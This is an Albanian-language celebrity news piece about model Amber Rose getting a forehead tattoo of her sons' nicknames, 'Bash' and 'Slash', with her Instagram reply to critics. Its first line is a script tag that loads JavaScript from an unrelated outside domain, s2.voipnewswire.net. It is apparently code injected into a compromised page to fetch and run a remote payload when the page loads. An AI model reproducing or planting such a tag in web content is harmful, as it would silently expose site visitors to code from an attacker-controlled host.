<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>
Modelja e amerikane, Amber Rose, ka vendosur të ketë një kujtim të përhershëm të fëmijëve të saj.
Ylli 36-vjeçar është parë me një tatuazh goxha të madh në ballë ku shkruan “Bash” dhe “Slash” – emrat e dy fëmijëve të saj.
Ajo ka djalin shtatëvjeçar Sebastian Taylor Thomaz që njihet me nofkën Bash me ish-bashkëshortin Wiz Khalifa.
Ndërkaq, biondja në muajin tetor është bërë sërish nënë e një vogëlushi Slash Electric Alexander Edwards me të dashurin Alexander “AE” Edwards.
Natyrisht, njerëzit mendojnë se kjo është një zgjedhje e tmerrshme, por Amber nuk do t’ia dijë. “Ata që më thonë se jam shumë e bukur për të bërë tatuazh në fytyrë janë të njëjtit që më thonë se jam shumë e bukur edhe nëse mendojnë se jam e shëmtuar. Morali i gjithë kësaj është bëj çfarë të duash,” tha ajo në Instagram.
https://www.instagram.com/p/B8dMJignYYF/?utm_source=ig_embed